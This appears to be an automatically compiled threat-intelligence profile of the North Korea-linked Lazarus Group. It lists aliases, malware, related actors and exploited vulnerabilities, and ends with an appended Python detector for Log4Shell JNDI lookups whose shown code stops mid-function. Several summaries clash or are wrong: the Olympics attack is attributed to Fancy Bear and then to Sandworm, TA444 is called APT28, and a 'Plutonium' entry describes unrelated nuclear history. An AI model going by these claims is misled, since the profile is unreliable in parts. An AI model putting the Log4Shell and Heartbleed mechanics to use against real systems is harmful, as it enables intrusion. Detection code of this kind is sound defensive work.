Lazarus Group

Threat Actor Profile (updated 8 days ago)
The Lazarus Group, a notorious threat actor believed to be linked to North Korea, has had a series of significant cyber-attacks attributed to it over the past few years. Its malicious activities include the exploitation of digital infrastructure, the theft of cryptocurrency, and large-scale campaigns such as Operation DreamJob in Spain. Its intrusions often aim to establish kernel read/write primitives, which give the group control over targeted systems.

One notable incident involved an attack on the cryptocurrency tracking app CoinStats in June, in which approximately $2.2 million was stolen. The company's co-founder cited "significant evidence" pointing towards the Lazarus Group as the perpetrator.

Attribution in cybersecurity can be complex, however, as the 2018 Winter Olympics incident demonstrated. The destructive attacks on the event's digital infrastructure were initially thought to be the work of the Lazarus Group. Later investigations revealed that they were in fact a false-flag operation by the Russia-linked Fancy Bear APT, designed to pin the blame on North Korea's Lazarus Group. This highlights the sophisticated tactics these groups employ, including attempts to misdirect investigators and avoid detection.

Moreover, the Lazarus Group is known for its association with sub-groups such as Andariel and LilacSquid, which further complicates the threat landscape. These sub-groups use similar tactics and are collectively responsible for numerous cyber espionage campaigns against the South Korean defense industry. In addition, the largest decentralized finance exploit in history, the Ronin exploit of March 2022, was attributed to the Lazarus Group. The increasing complexity and scale of these attacks underscore the evolving threat posed by the Lazarus Group and similar entities.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
ID (votes): profile description

Labyrinth Chollima (5 votes): Labyrinth Chollima, a threat actor linked to North Korea, has been involved in numerous malicious activities since 2009. Tracked by CrowdStrike and other cybersecurity organizations, Labyrinth Chollima is part of the Lazarus Group, known for stealthy attacks targeting various industries such as acad

Andariel (5 votes): Andariel, a notorious threat actor associated with the Lazarus Group and linked to North Korea, is known for its malicious cyber activities. The group has been identified using DTrack malware and Maui ransomware, notably in mid-2022, and has developed a reputation for exploiting ActiveX objects. Res

Sinbad (4 votes): Sinbad is a threat actor suspected to be operated by North Korean operatives, primarily for the purpose of laundering stolen cryptocurrency. According to Chainalysis, Sinbad processed $24 million in December and January, indicating its use as a new mixing service. However, its effectiveness is yet

Tornado Cash (4 votes): Tornado Cash, a known threat actor in the cybersecurity landscape, has been under the spotlight for its illicit activities. The group is associated with various malicious intents and actions, ranging from a single person to a private company or even part of a government entity. In recent times, it h

APT38 (4 votes): APT38, also known as TA444, BlueNoroff, BlackAlicanto, Copernicium, Sapphire Sleet, Stardust Chollima, and TraderTraitor, is a threat actor group suspected to be backed by the North Korean regime. The group has been active in operations across over 16 organizations in at least 11 countries, primaril

Operation Dreamjob (3 votes): Operation DreamJob is a campaign attributed to the Lazarus group, a North Korea-aligned group infamous for its cyberespionage and financial theft activities. The campaign was first coined in a blog post by ClearSky in August 2020, where it described Lazarus' attempts to target defense and aerospace

Diamond Sleet (3 votes): Diamond Sleet, a North Korea-linked Advanced Persistent Threat (APT), has been identified as a significant threat actor in the cybersecurity landscape. This group is known for its sophisticated supply chain attacks, specifically leveraging CyberLink software to execute their malicious activities. Th

ZINC (3 votes): Zinc, also known as Diamond Sleet, is a North Korea-based threat actor group that has been actively involved in cyberattacks on global media, defense, and IT industries. Microsoft's Threat Intelligence Center has been tracking the group's activities, which have included weaponizing open-source softw

Tradertraitor (3 votes): TraderTraitor, also known as Lazarus Group or APT38, is a threat actor attributed to the North Korean government. This group has been linked by the FBI to several recent cyberattacks on cryptocurrency platforms, with hundreds of millions of dollars in cryptocurrency stolen. The attacks share similar

Kimsuky (3 votes): Kimsuky is a North Korea-linked advanced persistent threat (APT) group that conducts global cyber-attacks to gather intelligence for the North Korean government. The group has been identified as a significant threat actor, executing actions with malicious intent, and has recently targeted victims vi

Emerald Sleet (2 votes): Emerald Sleet, a North Korea-affiliated advanced persistent threat (APT) group, has emerged as a significant cybersecurity concern. The group leverages OpenAI's ChatGPT, the same technology that underpins Microsoft's Copilot, to enhance its malicious activities. These activities include spear-phishi

Apt43 (2 votes): APT43, also known as Kimsuky, is a North Korean state-sponsored advanced persistent threat (APT) group that has been actively involved in cybercrime and espionage. The group has been implicated in a series of attacks exploiting vulnerabilities, which have drawn the attention of various cybersecurity

Stardust Chollima (2 votes): Stardust Chollima is a recognized threat actor in the cybersecurity industry, primarily known for its malicious activities aimed at acquiring funds. This group has been linked to various high-profile cyber-attacks and fraudulent activities since 2015. Stardust Chollima has been associated with the f

temp.hermit (2 votes): Temp.Hermit, also known as Lazarus Group or Hidden Cobra, is a threat actor group associated with North Korea's Reconnaissance General Bureau (RGB). The group has been operational since 2013 and is known for its cyberespionage activities targeting governments and sectors such as defense, telecommuni

TA444 (2 votes): TA444, also known as BlueNoroff, APT28, Nickel Gladstone, Sapphire Sleet, Stardust Chollima, and other monikers, is a prolific North Korean state-backed threat actor known for its malicious cyber activities. The group has been continuously generating proprietary malware, distinguishing it from other

Sapphire Sleet (2 votes): Sapphire Sleet is a threat actor, or malicious entity, that is linked to North Korea. This group has been identified as an Advanced Persistent Threat (APT), known for executing sophisticated and continuous cyberattacks. Sapphire Sleet has been particularly active in targeting IT job seekers through

Unc4736 (2 votes): UNC4736, a threat actor suspected to have North Korean connections, has been implicated in a series of cybersecurity breaches. The group gained initial access to the 3CX environment when an employee downloaded a financial trading package named X_TRADER from Trading Technologies' website. Unbeknownst

HIDDEN COBRA (2 votes): Hidden Cobra, also known as the Lazarus Group and Sapphire Sleet, is a North Korean cyberespionage group that has been active since at least 2009. The U.S. Government uses the term Hidden Cobra to refer to malicious cyber activities by the North Korean government, with the BeagleBoyz representing a

Sharpshooter (1 vote): Sharpshooter is a threat actor that has been identified as a significant cybersecurity risk. The operation was initially discovered in December 2018, where it used a unique implant framework to infiltrate global defense and critical infrastructure sectors, including nuclear, defense, energy, and fin

Velvet Chollima (1 vote): Velvet Chollima, also known as Kimsuky, APT43, Thallium, Black Banshee, and Emerald Sleet among other names, is a threat actor believed to be based in North Korea. The group has been active since 2012 and is linked to North Korea's General Reconnaissance Bureau, the country's main military intellige

Guardians of Peace (1 vote): The Guardians of Peace is a threat actor, a term used in cybersecurity to refer to entities that execute actions with malicious intent. This group is most notorious for its 2014 cyberattack on Sony Pictures, during which they disclosed confidential data including private details about employees and

Lilacsquid (1 vote): LilacSquid is a threat actor that has been actively targeting organizations in the U.S., Europe, and Asia since at least 2021. This group utilizes various tactics, techniques, and procedures (TTPs) to execute their malicious activities, including the use of Secure Socket Funneling (SSF) to establish

Reconnaissance General Bureau (RGB) (1 vote): The Reconnaissance General Bureau (RGB) is a North Korean military intelligence agency identified as a threat actor responsible for various cyberattacks. RGB is associated with hacking groups known as the "Lazarus Group," "Bluenoroff," and "Andariel," which are recognized as agencies or controlled e
Miscellaneous Associations
Other elements of context that could aid in identifying relevance:

Malware, Apt, Exploit, Ransomware, State Sponso..., Vulnerability, Backdoor, Infiltration, exploitation, Reconnaissance, Kaspersky, Korean, Espionage, Phishing, Laundering, Payload, Microsoft, Bitcoin, Macos, Cybercrime, Windows, Jumpcloud, Fbi, Operation Dr..., Github, Implant, DreamJob, Dprk, Manageengine, Treasury, Avast, Coinex, Eset, 3cx, Lateral Move..., Loader Malware, Mandiant, Rootkit, Iis, Russia, flaw, Exploits, Financial, Healthcare, Health, Facebook, Spearphishing, Scams, Curl, Downloader, Encrypt, Zero Day, Talos, Pypi, Ransom, CISA, Operation Bl..., Trojan, Spyware, Cisco, Jamf, Symantec, Linux, Papercut, exploited, Chrome, Google, russian, Finance, Drainer, Government, Rat, Cybercrimes, Chinese, Cloudzy, Hackread, Sentinellabs, Zimbra, Remote Code ..., RCE (Remote ..., Confluence, Private Keys, Aerospace, Ponzi, Encryption, Discord, Worm, Telegram, Log4j, NSO Group, Teamcity, Aws, Asia, Proxy, Antivirus, Python, UAE
Associated Malware
ID [relation type] (votes): profile description

Quiterat [Unspecified] (4 votes): QuiteRAT is a new type of malware associated with the North Korea-linked Lazarus Group, known for their use of custom malware. Built using the Qt framework, QuiteRAT is smaller in size compared to MagicRAT, another malware linked to the group, due to its incorporation of fewer Qt libraries and lack

Magicrat [Unspecified] (4 votes): MagicRAT is a type of malware, first observed by Cisco Talos in 2022, that was used by the Lazarus Group to exploit vulnerabilities in publicly exposed VMWare Horizon platforms, primarily targeting energy companies worldwide. This malicious software, which can infiltrate systems through suspicious d

Kandykorn [Unspecified] (4 votes): KandyKorn is a new strain of malware that has recently been identified as an emerging threat to the technology sector, particularly targeting blockchain engineers. The malicious software, which is designed to infiltrate and damage computer systems, often enters undetected through suspicious download

WannaCry [Unspecified] (4 votes): WannaCry is a type of malware, specifically ransomware, that caused significant global disruption in 2017. It exploited Windows SMBv1 Remote Code Execution Vulnerabilities (CVE-2017-0144, CVE-2017-0145, CVE-2017-0143), which allowed it to spread rapidly and infect over 200,000 machines across more t

Dtrack [Unspecified] (3 votes): DTrack is a type of malware, or malicious software, known for its destructive capabilities. It can infiltrate systems through dubious downloads, emails, or websites and wreak havoc by stealing personal information, disrupting operations, or holding data hostage for ransom. Notably, DTrack was utiliz

Earlyrat [Unspecified] (3 votes): EarlyRat is a previously undocumented malware discovered by Kaspersky researchers in June. The North Korea-linked Advanced Persistent Threat (APT) group Andariel used EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. The malware was first noticed in one of the Log4j cases,

Lightlesscan [Unspecified] (3 votes): LightlessCan is a new and advanced malware, discovered by ESET, that has been added to North Korea's Lazarus group's arsenal. The malware is a successor to the group's flagship HTTP(S) Lazarus Remote Access Trojan (RAT) named BlindingCan. LightlessCan represents a significant advancement in maliciou

AppleJeus [Unspecified] (3 votes): AppleJeus is a notorious malware attributed to the North Korean APT Lazarus Group, designed primarily to steal cryptocurrency. This malicious software has been a key instrument in North Korea's financial theft operations, with threat groups pilfering $2.3 billion USD worth of crypto assets between M

Collectionrat [Unspecified] (3 votes): CollectionRAT is a newly identified malware, discovered by cybersecurity researchers who traced its origins through reused infrastructure components. This malicious software, short for Malware, is designed to exploit and damage computers or devices, often infiltrating systems via suspicious download

Spectralblur [Unspecified] (2 votes): SpectralBlur is a new form of malware that has emerged as a significant cybersecurity threat in 2024. It is characterized as a backdoor Trojan targeting macOS systems, allowing unauthorized access and control over infected devices. This malicious software is capable of exploiting and damaging the us

Inksquid [Unspecified] (1 vote): no profile description

Badrat [Unspecified] (1 vote): no profile description

Rustbucket [Unspecified] (1 vote): RustBucket is a malicious software (malware) campaign that was first uncovered in 2021 and attributed to BlueNoroff, a North Korea-linked Advanced Persistent Threat (APT) group. The malware is known for its ability to exploit and damage computer systems, often infiltrating through suspicious downloa

Gopuram [Unspecified] (1 vote): Gopuram is a malicious software or malware that infiltrates systems to exploit and cause damage. It has been known to infect systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt operations, or even hold

Ryuk [Unspecified] (1 vote): Ryuk is a sophisticated malware, specifically a ransomware variant, that has been extensively used by cybercriminal group ITG23. The group has been employing crypting techniques for several years to obfuscate their malware, with Ryuk often seen in tandem with other malicious software such as Trickbo

Shamoon [Unspecified] (1 vote): Shamoon is a malicious software (malware) known for its destructive capabilities, particularly in wiping out data from infected systems. It first gained notoriety in 2012 when it was used in an attack on Saudi Aramco, crippling approximately 30,000 systems at the company. The malware replaced the co

Duuzer [Unspecified] (1 vote): Duuzer is a malicious software (malware) known for its harmful capabilities designed to exploit and damage computers or devices. It was first used in 2015, primarily targeting South Korean organizations, particularly those in the manufacturing sector. The malware, compatible with both 32-bit and 64-

Rising Sun [Unspecified] (1 vote): Rising Sun is a malicious software (malware) that shares significant similarities with the Lazarus Group's Duuzer implant. It uses source code from the Duuzer backdoor, a malware first used in a 2015 campaign that targeted South Korean organizations, primarily in manufacturing. The Rising Sun malwar

ThreatNeedle [Unspecified] (1 vote): ThreatNeedle is a malicious software (malware) that has been identified as a tool used by the notorious North Korean Advanced Persistent Threat (APT) group, Lazarus. This malware, designed to exploit and damage computer systems, can infiltrate systems through suspicious downloads, emails, or website

KONNI [Unspecified] (1 vote): Konni is a malware, short for malicious software, that poses a significant threat to computer systems and data. It's designed to infiltrate systems surreptitiously through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside a system, Konni can wreak havoc by stealin

Opencarrot [Unspecified] (1 vote): OpenCarrot is a malicious software (malware) that targets Windows operating systems, enabling unauthorized access and control over infected machines. Identified by IBM X-Force, it has been linked to the activities of the Lazarus Group, a North Korean cyber threat operation known for its sophisticated

Hermit [Unspecified] (1 vote): Hermit is a malicious software (malware) linked to North Korea, also known as the "Hermit Kingdom" due to its isolationist policies. This malware, along with others like Pegasus and DevilsTongue, targeted Apple users leading to a wave of sophisticated attacks in July 2022. In response, Apple develop

TYPEFRAME [Unspecified] (1 vote): Typeframe is a notorious malware variant known for its damaging potential. It was designed to exploit and harm computers or devices by infiltrating systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt o

Olympic Destroyer [Unspecified] (1 vote): Olympic Destroyer is a notorious malware that was used to disrupt the 2018 Pyeongchang Winter Olympics. The cyberattack, attributed to the Sandworm group, significantly impacted the event's IT infrastructure, including broadcasting, ticketing, various Olympics websites, and Wi-Fi at the host stadium

BLINDINGCAN [Unspecified] (1 vote): BlindingCan, also known as AIRDRY or ZetaNile, is a multifaceted malware capable of extracting sensitive data from compromised hosts. The threat actor gained initial access to systems via spear-phishing attacks masquerading as recruiters for high-profile companies and deployed new malware dubbed "Li

Volgmer [Unspecified] (1 vote): Volgmer is a backdoor Trojan malware, designed to provide covert access to a compromised system. Developed by the Lazarus Group, it has been used as a conduit for serving backdoors to control infected systems. This malware has been observed in 32-bit form as either executables or dynamic-link librar

Green Lambert [Unspecified] (1 vote): Green Lambert is a family of malware tools that are closely related to Blue Lambert. It was discovered while looking for malware similar to Blue Lambert, and it is considered a lighter, more reliable, but older version of Blue Lambert. The Green Lambert family stands out as the only one where non-Wi

Objcshellz [Unspecified] (1 vote): ObjCShellz is a lightweight but advanced malware written in Objective-C, identified by researchers from Jamf Threat Labs in November 2023. This malicious software is designed to infiltrate macOS systems and enable remote execution of commands by attackers. It is characterized by its advanced obfusca

SapphireStealer [Unspecified] (1 vote): SapphireStealer is a malicious software, or malware, that has gained significant traction in the cybersecurity landscape. This open-source .NET-based information-stealing malware has been employed by various threat groups, with some even creating their own customized versions. The malware's capabili

Swiftloader [Unspecified] (1 vote): SwiftLoader is a sophisticated malware that functions as a PDF viewer to lure unsuspecting victims. It was initially used in the RustBucket campaign, where it served as a second-stage malware, infecting systems through seemingly innocent downloads such as documents sent to targets. Notably, SwiftLoa

Carbanak [Unspecified] (1 vote): Carbanak is a sophisticated type of malware, short for malicious software, that is designed to exploit and damage computer systems. It can infiltrate systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt

Fudmodule [Unspecified] (1 vote): FudModule is a sophisticated malware developed by the Lazarus cyber-criminal group, known for its exceptional stealth and advanced capabilities. The group exploited a vulnerability in Microsoft's system, tagged as CVE-2024-21338, to perform direct kernel object manipulation using an updated version

Cloudmensis [Unspecified] (1 vote): CloudMensis, a form of malware specifically designed to exploit macOS systems, was first brought to light by ESET in July 2022. The software infiltrates devices primarily through email attachments, causing significant security breaches once inside. Once installed, CloudMensis works diligently to ide
Associated Threat Actors
IDTypeVotesProfile Description
Bluenoroffis related to
4
BlueNoroff, a threat actor closely associated with the notorious Lazarus Group, has been actively involved in malicious cyber activities primarily targeting financial institutions and cryptocurrency businesses. Known for its sophisticated attacks on banks, casinos, fintech companies, POST software,
Technical Reconnaissance BureauUnspecified
4
The Technical Reconnaissance Bureau (TRB), also known as the Fourteenth Bureau, is a North Korea-based threat actor that leads the Democratic People's Republic of Korea's (DPRK) development of offensive cyber tactics and tools. The TRB conducts mail inspection, telecommunications inspection and cont
APT37Unspecified
3
APT37, also known as ScarCruft, Reaper, or Group123, is a threat actor suspected to be linked to North Korea. It primarily targets South Korea but has also extended its activities to Japan, Vietnam, and the Middle East, focusing on various industry verticals such as chemicals, electronics, manufactu
Onyx SleetUnspecified
3
Onyx Sleet, a North Korean nation-state threat actor, has been identified as a significant cybersecurity risk by Microsoft. Operating under the Lazarus Group umbrella, Onyx Sleet primarily targets defense and IT services organizations in South Korea, the United States, and India. In October 2023, Mi
sinbad.ioUnspecified
3
Sinbad.io, a threat actor identified as a popular money-laundering outlet for state-sponsored crypto thieves, emerged as a significant player in the cybercrime landscape over the past few years. Following U.S. sanctions on Tornado Cash, a previously favored service by North Korean hackers to obfusca
RgbUnspecified
2
RGB, a threat actor with ties to North Korea, has been involved in a range of malicious cyber activities. The group was designated by the Office of Foreign Assets Control (OFAC) on January 2, 2015, under Executive Order 13687 for being a controlled entity of the North Korean government. In addition
Wicked PandaUnspecified
2
Wicked Panda, also known as APT41, Double Dragon, and Bronze Atlas, is a state-sponsored threat actor originating from China. Recognized as one of the top cyber threats by the Department of Health and Human Services' Health Sector Cybersecurity Coordination Center, this group has been associated wit
ThalliumUnspecified
2
Thallium, also known as Kimsuky, Velvet Chollima, and APT43, is a North Korean state-sponsored threat actor or hacking group that has been active since 2012. Tracked by the Cybereason Nocturnus Team and other security researchers, this cyber espionage group is believed to operate on behalf of the No
APT41Unspecified
2
APT41, also known as Winnti, Wicked Panda, and Wicked Spider, is a sophisticated threat actor attributed to China. This group has been active since at least 2012, targeting organizations across 14 countries. The group is known for its extensive use of various code families and tools, with at least 4
APT28Unspecified
2
APT28, also known as Fancy Bear, is a threat actor linked to Russia and has been involved in numerous cyber espionage campaigns. The group is notorious for its sophisticated tactics, techniques, and procedures (TTPs). Recently, NATO and the EU formally condemned APT28's activities, acknowledging the
Double DragonUnspecified
2
Double Dragon, also known as APT41, Winnti, or Barium, is a prominent Advanced Persistent Threat (APT) group believed to have originated from China. As a threat actor, Double Dragon represents a human entity with the intent to execute actions of a malicious nature. The group has been identified by t
ScarCruftUnspecified
2
ScarCruft, also known as APT37, Inky Squid, RedEyes, Reaper, or Group123, is a North Korean threat actor group associated with malicious cyber activities. Their actions have been linked to the execution of targeted attacks against individual Android devices, as outlined in a VB2023 paper titled "Int
Reconnaissance General BureauUnspecified
2
The Reconnaissance General Bureau (RGB) is a North Korean intelligence agency responsible for clandestine operations abroad, including cyber activities. The RGB has been associated with several threat actors, including the BeagleBoyz, who have likely been active since at least 2014. Other groups lin
APT33Unspecified
2
APT33, an Iran-linked threat actor, has been identified as a significant cyber threat to the Defense Industrial Base sector. The group is known for its sophisticated and malicious activities, which primarily involve executing actions with harmful intent. APT33, like other threat actors, could be a s
Bl00dyUnspecified
1
Bl00dy is a threat actor known for its malicious activities in the cyber world. The group, along with another threat actor called Black Basta, have recently been identified as exploiting bugs in ConnectWise ScreenConnect, a popular remote management tool. This exploitation has led to a significant i
APT10Unspecified
1
APT10, also known as the Menupass Team, is a threat actor believed to operate on behalf of the Chinese Ministry of State Security (MSS). The group has been active since 2009 and is suspected to be based in Tianjin, China, according to research by IntrusionTruth in 2018. APT10 has primarily targeted
SandwormUnspecified
1
Sandworm, a threat actor linked to Russia, has been implicated in numerous high-profile cyber attacks. This group's activities have primarily targeted Ukraine, compromising the country's critical infrastructure and telecommunications providers. The Sandworm group is known for its fileless attack met
NICKELUnspecified
1
Nickel is a notable threat actor, or malicious entity, that has been involved in significant cyber operations. Notably, Nickel targeted government organizations across Latin America and Europe, alongside other nation-state affiliated threat actors such as FIN6 and Emissary Panda. These groups focuse
NICKEL ACADEMYUnspecified
1
Nickel Academy is a threat actor, known for its malicious campaigns. In November 2017, the North Korean cyber threat group, known as the Lazarus Group, launched a spearphishing campaign using a job opening for a CFO role at a European-based cryptocurrency company as bait. CTU researchers discovered
BeagleBoyzUnspecified
1
The BeagleBoyz, also known as threat activity group 71 (TAG-71), is a significant cybersecurity threat actor with strong ties to the North Korean state-sponsored APT38. This group, recognized under various aliases such as Bluenoroff and Stardust Chollima, has been involved in extensive cyber operati
FIN7Unspecified
1
FIN7, a notorious threat actor group known for its malicious activities, has recently been identified as targeting a large U.S. carmaker with phishing attacks. This group, which has previously operated behind fake cybersecurity companies such as Combi Security and Bastion Secure to recruit security
LapsusUnspecified
1
Lapsus is a significant threat actor that has been active since its inception in early 2022. The group gained notoriety for its cyberattacks, including a high-profile breach of Nvidia, an American multinational technology company, in the same year. This attack led to the leak of thousands of passwor
APT34Unspecified
1
APT34, also known as OilRig, EUROPIUM, Hazel Sandstorm, and Crambus among other names, is a threat actor believed to be operating on behalf of the Iranian government. Operational since at least 2014, APT34 has been involved in long-term cyber espionage operations primarily focused on reconnaissance
APT36Unspecified
1
APT36, also known as Transparent Tribe and Earth Karkaddan, is a notorious threat actor believed to be based in Pakistan. The group has been involved in cyberespionage activities primarily targeting India, with a focus on government, military, defense, aerospace, and education sectors. Their campaig
OceanLotusUnspecified
1
OceanLotus, also known as APT32, is a threat actor suspected to be linked with Vietnam. It primarily targets foreign companies involved in manufacturing, consumer products, consulting, and hospitality sectors that are investing or planning to invest in Vietnam. The group's recent activities indicate
SidewinderUnspecified
1
The Sidewinder threat actor group, also known as Rattlesnake, BabyElephant, APT Q4, APT Q39, Hardcore Nationalist, HN2, RAZOR Tiger, and GroupA21, is a significant cybersecurity concern with a history of malicious activities dating back to 2012. This report investigates a recent campaign by Sidewind
APT29Unspecified
1
APT29, also known as Cozy Bear, SVR group, BlueBravo, Nobelium, Midnight Blizzard, and The Dukes, is a threat actor linked to Russia. This group is notorious for its malicious activities in the cybersecurity realm, executing actions with harmful intent. It has been associated with several high-profi
TurlaUnspecified
1
Turla, also known as Pensive Ursa, is a sophisticated threat actor linked to Russia that has been active for many years. The group is known for its advanced cyber-espionage capabilities and has been associated with numerous high-profile breaches. According to the MITRE ATT&CK and MITRE Ingenuity dat
Evil CorpUnspecified
1
Evil Corp, a threat actor group based in Russia, has been identified as a significant cybercrime entity responsible for the execution of malicious actions. The alleged leader of this group is Maksim Yakubets, who is notably associated with Dridex malware operations. The U.S. Treasury imposed sanctio
TEMP.Reaper | Unspecified | 1 | (no profile description)
FIN12 | Unspecified | 1 | FIN12, also known as DEV-0237 and Pistachio Tempest, is a threat actor group notorious for its malicious cyber activities. Tracked by Microsoft, this group is primarily engaged in the distribution of Hive, Conti, and Ryuk ransomware. The group has been responsible for several high-profile ransomware
Ricochet Chollima | Unspecified | 1 | Ricochet Chollima, also known as Ruby Sleet or ScarCruft among other aliases, is a threat actor associated with the Democratic People's Republic of Korea (DPRK). Active in espionage operations since at least 2016, Ricochet Chollima has primarily targeted South Korean individuals and entities, focusi
Ruby Sleet | Unspecified | 1 | Ruby Sleet, also known as Ricochet Chollima and CERIUM, is a North Korean threat actor that has been actively targeting governmental and defense sectors across several countries. According to a Microsoft report, from November 2022 to January 2023, Ruby Sleet, in conjunction with another threat actor
Kryptonite Panda | Unspecified | 1 | Kryptonite Panda, also known as APT40, Bronze Mohawk, Periscope, Mudcarp, and GINGHAM TYPHOON among others, is a threat actor believed to be based in Haikou, Hainan Province, People's Republic of China. This threat group has been associated with an array of cyber-espionage operations targeting gover
OilRig | Unspecified | 1 | OilRig is a well-known threat actor in the cybersecurity landscape, notorious for its sophisticated attacks on various targets, including Middle Eastern telecommunications organizations and Israel's critical infrastructure sector. This entity has been linked to several high-profile campaigns such as
Inky Squid | Unspecified | 1 | (no profile description)
Darkseoul | Unspecified | 1 | DarkSeoul, also known as Onyx Sleet, Plutonium, and Andariel, is a threat actor group believed to be associated with the 110th Research Center. This group has been active since at least 2013, when it launched the DarkSeoul campaign, resulting in significant damage to thousands of systems in the fina
Cryptocore | Unspecified | 1 | CryptoCore, also known as UNC1069, is a threat actor linked to the North Korea-associated Advanced Persistent Threat (APT) group, Sapphire Sleet. This group, alternatively referred to as APT38, BlueNoroff, CageyChameleon, and CryptoCore, operates as a subgroup of the notorious Lazarus APT group. The
Magicline4nx is a threat actor that has recently emerged as a significant cybersecurity concern. This entity, which could be an individual, a private company, or a part of a government organization, is responsible for executing actions with malicious intent. In the realm of cybersecurity, where nami
PlutoniumUnspecified
1
Plutonium, a threat actor with potentially global implications, has been involved in several critical incidents. The group's activities have been traced back to the 1960s when alleged Israeli scientists visited NUMEC, claiming to obtain plutonium-238 for non-nuclear projects. The lack of stringent r
Whois Team | Unspecified | 1 | (no profile description)
Phosphorus | Unspecified | 1 | Phosphorus, also known as APT35 or Charming Kitten, is a notorious Iranian cyberespionage group linked to the Islamic Revolutionary Guard Corps (IRGC). This threat actor has been involved in a series of malicious activities, employing novel tactics and tools. A significant discovery was made by the
Volt Typhoon | Unspecified | 1 | Volt Typhoon, a threat actor linked to China, has been identified as a significant cyber threat with strong operational security. Known for their sophisticated Advanced Persistent Threat (APT) activities, this group has been associated with the KV-Botnet and has remained undetected within U.S. infra
Anunak | Unspecified | 1 | Anunak, also known as Carbanak or FIN7, is a prominent threat actor in the cybercrime landscape. The group emerged around 2013 and specializes in financial theft, primarily targeting Eastern European banks, U.S. and European point-of-sale systems, and other entities. The name "Carbanak" was coined b
Blender | Unspecified | 1 | Blender (Blender.io) is a cryptocurrency mixing service rather than an intrusion group; it has recently been under scrutiny due to its alleged role in facilitating illegal transactions, which is why it appears among the actors associated with Lazarus. Last year, the US imposed sanctions on crypto mixers Tornado Cash and Blender, targeting them as part of a broader
Redeyes | Unspecified | 1 | RedEyes, also known as APT37, ScarCruft, Reaper, or BadRAT, is a threat actor group known for its malicious cyber activities. This group recently deployed a new malware named FadeStealer to extract information from targeted systems. They have also been observed using CloudMensis, a malware that seek
Reaper | Unspecified | 1 | Reaper, also known as APT37, Inky Squid, RedEyes, or ScarCruft, is a threat actor group attributed to North Korea. It deploys ROKRAT, a remote access trojan first publicly documented in 2017 and used in the group's espionage campaigns since then. This group is also tied to the NOKKI malware family, which originated from research surroun
Associated Vulnerabilities
ID | Type | Votes | Profile Description
Log4Shell | Unspecified | 4 | Log4Shell is a vulnerability in the popular Java logging library Apache Log4j 2, whose message-lookup feature evaluates ${...} expressions inside logged strings; a JNDI lookup placed in any attacker-controlled field that gets logged makes the library fetch and load a class from a remote server. Identified as CVE-2021-44228 (also listed separately below under that identifier), this vulnerability allows an attacker to remotely execute arbitrary code, often leading to full system compromise. Advanced Persistent
CVE-2023-42793 | Unspecified | 3 | CVE-2023-42793 is a critical security vulnerability identified in JetBrains TeamCity build management and continuous integration server. This flaw, characterized by an authentication bypass, was exploited by multiple threat actors throughout 2023 and into 2024. The first notable exploitation occurre
CVE-2023-29059 | Unspecified | 1 | No profile description; this identifier was assigned to the trojanized 3CX DesktopApp releases distributed in the March 2023 supply-chain compromise.
Quiterat | Unspecified | 1 | No profile description; QuiteRAT is a Lazarus remote access tool reported by Cisco Talos in 2023 and delivered through the ManageEngine flaw CVE-2022-47966 listed below, so it is malware rather than a vulnerability.
Heartbleed | Unspecified | 1 | Heartbleed (CVE-2014-0160) is a vulnerability in the OpenSSL cryptographic library disclosed in 2014. A missing bounds check in the TLS heartbeat extension lets a peer claim a payload length larger than the data it actually sent, so the server echoes back up to 64 KB of its own process memory per request, leaking private keys, session cookies and other secrets; hence the term "bleeding out data". The vulnerabi
CVE-2022-47966 | Unspecified | 1 | CVE-2022-47966 is a critical pre-authentication remote code execution vulnerability in multiple Zoho ManageEngine products, including ServiceDesk Plus, caused by an outdated Apache Santuario (xmlsec) library in the SAML single sign-on component. The flaw was exploited by malicious actors to gain unauthorized access to targeted organizations' systems and networks. The exploitation started just five days after proof-of
CVE-2022-26134 | Unspecified | 1 | CVE-2022-26134 is a critical software vulnerability that was discovered in Atlassian Confluence Server and Data Center. This flaw, which allows for remote code execution (RCE), was publicly disclosed by Atlassian in June 2022. The Cybersecurity and Infrastructure Security Agency (CISA) recognized th
Eternalblue | Unspecified | 1 | EternalBlue is an exploit for CVE-2017-0144, a remote code execution flaw in the Windows SMBv1 server that Microsoft patched in MS17-010 in March 2017 and that the Shadow Brokers leaked the following month. It is best known as the propagation mechanism of the WannaCry ransomware worm in May 2017. The exploit allows attackers
CVE-2021-44228 | Unspecified | 1 | CVE-2021-44228, also known as the Log4j vulnerability or Log4Shell (see the entry above), is a software flaw found in Apache Log4j, a widely used logging utility. Despite multiple attempts by Advanced Persistent Threat (APT) actors to exploit this vulnerability in the ServiceDesk system, these efforts were unsuccessful. However, it b
CVE-2024-21338 | Unspecified | 1 | No profile description; CVE-2024-21338 is a Windows kernel elevation-of-privilege flaw in the AppLocker driver appid.sys, patched by Microsoft in February 2024, and is the kind of flaw that yields the kernel read/write primitives mentioned in the profile above.
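The Log4Shell and CVE-2021-44228 entries describe the flaw but not what exploitation attempts look like in logs, where they are usually wrapped in Log4j's nested lookups to evade naive string matching. The following is an added example, not code from this page or from any vendor named on it: a small Python detector that percent-decodes each line, collapses the lookup forms Log4j 2 evaluates (${lower:...}, ${upper:...} and the ${name:-default} fallback, which is why ${::-j} becomes "j"), and only then matches on a JNDI lookup pointing at a remote resolver. Treating only those three forms as expandable is a simplifying assumption; the access-log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Innermost Log4j lookup: a "${...}" whose body holds no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")

# A JNDI lookup naming a remote resolver, matched only after normalization.
_JNDI_TOKEN = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:[^}]*\}",
    re.IGNORECASE,
)


def _resolve_inner(match):
    """Evaluate one innermost lookup the way Log4j 2's string substitution does."""
    body = match.group(1)
    # Default-value syntax "${name:-default}": the default is substituted when
    # the lookup fails, so "${::-j}" and "${env:NOPE:-j}" both yield "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name.strip().lower() == "lower":
        return arg.lower()
    if sep and name.strip().lower() == "upper":
        return arg.upper()
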